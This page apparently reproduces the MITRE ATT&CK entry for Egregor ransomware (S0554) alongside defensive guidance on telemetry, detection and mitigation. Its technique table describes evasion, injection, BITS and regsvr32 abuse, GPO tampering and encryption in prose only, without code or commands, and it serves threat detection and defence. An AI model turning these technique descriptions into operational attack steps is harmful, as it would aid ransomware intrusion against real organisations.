S0554: Egregor
Analyst context for executives and security teams
Egregor is a Windows ransomware-as-a-service tool documented by ATT&CK, with reported code similarities to Sekhmet and Maze. Its relationship set matters because it spans more than encryption: discovery of users, groups, systems, network connections, use of PowerShell/cmd and Windows utilities, remote access tooling, stealth techniques, network share collection, Group Policy modification, and data encryption for impact. For leaders, this is a reminder that ransomware readiness is not just backup quality; it depends on whether identity, endpoint, network, and Windows administration telemetry can show the path to impact before or during an incident.
Executive priority
Treat this object as a ransomware resilience validation case. Ask whether the organization can prove coverage for Windows execution, domain and user discovery, remote access tool use, Group Policy changes, suspicious BITS jobs, regsvr32/rundll32 abuse, process injection indicators, network share access, and early signs of mass encryption. Prioritize controls and evidence that reduce blast radius: privileged access governance, change control over GPOs, monitored administrative tooling, segmentation around shared drives, and tested recovery processes. Because ATT&CK provides no official detection text for Egregor, local validation and incident response playbooks should drive confidence rather than assumptions of tool-specific detection.
Technical view
SOC and IR teams should map Egregor-related coverage to the listed ATT&CK relationships: execution through PowerShell, Windows Command Shell, Native API, DLL abuse, Regsvr32, Rundll32, and BITS Jobs; discovery through system owner/user, domain groups, system information, network connections, and system time; stealth through packing, deobfuscation, masqueraded tasks/services, process injection, and sandbox/time checks; command-and-control or staging through web protocols, ingress tool transfer, and remote access tools; collection from network shared drives; privilege or defense impairment through Group Policy modification; and impact through data encryption. Since the base malware object lists Windows as the platform and no official detection is supplied, detections should be behavior-led and tested against benign administrative baselines.
Likely telemetry
- Windows endpoint process creation and command-line logging for PowerShell, cmd.exe, regsvr32.exe, rundll32.exe, and BITS-related activity
- PowerShell script block, module, and transcription logs where enabled
- Windows service, scheduled task, and task/service naming telemetry for masquerading review
- EDR telemetry for process injection, suspicious DLL loading, packed executables, and in-memory execution patterns
- Active Directory and domain controller logs for domain group enumeration and Group Policy Object modification
Detection direction
- Build behavior-based detections across the related techniques rather than relying on an Egregor-specific signature, because official ATT&CK detection guidance is not provided.
- Tune PowerShell, cmd.exe, regsvr32.exe, rundll32.exe, BITS, and DLL-loading detections against known administrative and software-management activity to reduce false positives.
- Correlate discovery behaviors with later tool transfer, remote access, network share access, GPO modification, or encryption activity; individual discovery commands may be benign, but clustering increases investigative value.
- Monitor GPO modifications as high-value events, especially changes affecting security controls, scripts, startup behavior, or domain-wide configuration.
- Validate visibility on network shared drives, since ransomware impact and data collection can occur through accessible shares rather than only local disks.
Mitigation priorities
- Prioritize resilient recovery: tested backups, restoration procedures, and protection of backup infrastructure from domain-wide compromise.
- Harden identity and Windows administration paths: restrict privileged groups, monitor domain group changes, and enforce change control for Group Policy.
- Limit lateral reach to shared drives using least privilege, segmentation, and auditing of sensitive file repositories.
- Constrain and monitor scripting and living-off-the-land utilities such as PowerShell, cmd.exe, BITS, regsvr32.exe, and rundll32.exe according to business need.
- Govern legitimate remote access tools with approved inventories, authentication controls, logging, and exception review.
Analyst notes and limits
The object is a malware entry for Egregor, external ID S0554, in the enterprise ATT&CK domain, with Windows as the listed platform. ATT&CK describes it as Ransomware-as-a-Service first observed in September 2020 and cites NHS Digital, Cyble, and Security Boulevard reporting, including noted code similarities with Sekhmet and Maze. The most useful defensive value comes from the relationship context: Egregor is linked to execution, stealth, discovery, collection, command-and-control, privilege/defense impairment, and impact techniques.
ATT&CK provides no official detection text, no aliases, and no object-level tactics for this entry. The relationship techniques provide behavior context, but they do not prove activity in any specific environment or guarantee that a given control detects Egregor. Local telemetry availability, Windows logging configuration, EDR visibility, identity architecture, remote access tool inventory, and file share design are required to assess actual exposure and coverage.
Egregor
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1497.003 | Time Based Checks Sub-technique | Egregor can perform a long sleep (greater than or equal to 3 minutes) to evade detection.CitationJoeSecurity Egregor 2020 |
| Enterprise | T1218.011 | Rundll32 Sub-technique | Egregor has used rundll32 during execution.CitationCybereason Egregor Nov 2020 |
| Enterprise | T1197 | BITS Jobs | Egregor has used BITSadmin to download and execute malicious DLLs.CitationIntrinsec Egregor Nov 2020 |
| Enterprise | T1124 | System Time Discovery | Egregor contains functionality to query the local/system time.CitationJoeSecurity Egregor 2020 |
| Enterprise | T1027.002 | Software Packing Sub-technique | Egregor's payloads are custom-packed, archived and encrypted to prevent analysis.CitationNHS Digital Egregor Nov 2020CitationCyble Egregor Oct 2020 |
| Enterprise | T1039 | Data from Network Shared Drive | Egregor can collect any files found in the enumerated drivers before sending it to its C2 channel.CitationNHS Digital Egregor Nov 2020 |
| Enterprise | T1106 | Native API | Egregor has used the Windows API to make detection more difficult.CitationCyble Egregor Oct 2020 |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | Egregor has been decrypted before execution.CitationNHS Digital Egregor Nov 2020CitationCybereason Egregor Nov 2020 |
| Enterprise | T1036.004 | Masquerade Task or Service Sub-technique | Egregor has masqueraded the svchost.exe process to exfiltrate data.CitationIntrinsec Egregor Nov 2020 |
| Enterprise | T1049 | System Network Connections Discovery | Egregor can enumerate all connected drives.CitationNHS Digital Egregor Nov 2020 |
| Enterprise | T1033 | System Owner/User Discovery | Egregor has used tools to gather information about users.CitationIntrinsec Egregor Nov 2020 |
| Enterprise | T1105 | Ingress Tool Transfer | Egregor has the ability to download files from its C2 server.CitationCybereason Egregor Nov 2020CitationIntrinsec Egregor Nov 2020 |
| Enterprise | T1685 | Disable or Modify Tools | Egregor has disabled Windows Defender to evade protections.CitationIntrinsec Egregor Nov 2020 |
| Enterprise | T1497 | Virtualization/Sandbox Evasion | Egregor has used multiple anti-analysis and anti-sandbox techniques to prevent automated analysis by sandboxes.CitationCyble Egregor Oct 2020CitationNHS Digital Egregor Nov 2020 |
| Enterprise | T1574.001 | DLL Sub-technique | Egregor has used DLL side-loading to execute its payload.CitationCyble Egregor Oct 2020 |
| Enterprise | T1486 | Data Encrypted for Impact | Egregor can encrypt all non-system files using a hybrid AES-RSA algorithm prior to displaying a ransom note.CitationNHS Digital Egregor Nov 2020CitationCybereason Egregor Nov 2020 |
| Enterprise | T1069.002 | Domain Groups Sub-technique | |
| Enterprise | T1218.010 | Regsvr32 Sub-technique | Egregor has used regsvr32.exe to execute malicious DLLs.CitationJoeSecurity Egregor 2020 |
| Enterprise | T1071.001 | Web Protocols Sub-technique | Egregor has communicated with its C2 servers via HTTPS protocol.CitationIntrinsec Egregor Nov 2020 |
| Enterprise | T1219 | Remote Access Tools | Egregor has checked for the LogMein event log in an attempt to encrypt files in remote machines.CitationCyble Egregor Oct 2020 |
| Enterprise | T1059.003 | Windows Command Shell Sub-technique | Egregor has used batch files for execution and can launch Internet Explorer from cmd.exe.CitationJoeSecurity Egregor 2020CitationCybereason Egregor Nov 2020 |
| Enterprise | T1484.001 | Group Policy Modification Sub-technique | Egregor can modify the GPO to evade detection.CitationCybereason Egregor Nov 2020 CitationIntrinsec Egregor Nov 2020 |
| Enterprise | T1055 | Process Injection | Egregor can inject its payload into iexplore.exe process.CitationCyble Egregor Oct 2020 |
| Enterprise | T1059.001 | PowerShell Sub-technique | Egregor has used an encoded PowerShell command by a service created by Cobalt Strike for lateral movement.CitationIntrinsec Egregor Nov 2020 |
| Enterprise | T1082 | System Information Discovery | Egregor can perform a language check of the infected system and can query the CPU information (cupid).CitationJoeSecurity Egregor 2020CitationNHS Digital Egregor Nov 2020 |
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.0 | Current bundle | 17d0e143e52e… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
NHS Digital Egregor Nov 2020
NHS Digital. (2020, November 26). Egregor Ransomware The RaaS successor to Maze. Retrieved December 29, 2020.
Open source URL -
[2]
Cyble Egregor Oct 2020
Cybleinc. (2020, October 31). Egregor Ransomware – A Deep Dive Into Its Activities and Techniques. Retrieved December 29, 2020.
Open source URL -
[3]
Security Boulevard Egregor Oct 2020
Meskauskas, T.. (2020, October 29). Egregor: Sekhmet’s Cousin. Retrieved January 6, 2021.
Open source URL -
[4]
Egregor
(Citation: NHS Digital Egregor Nov 2020)(Citation: Cyble Egregor Oct 2020)
-
[5]
mitre-attack S0554Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.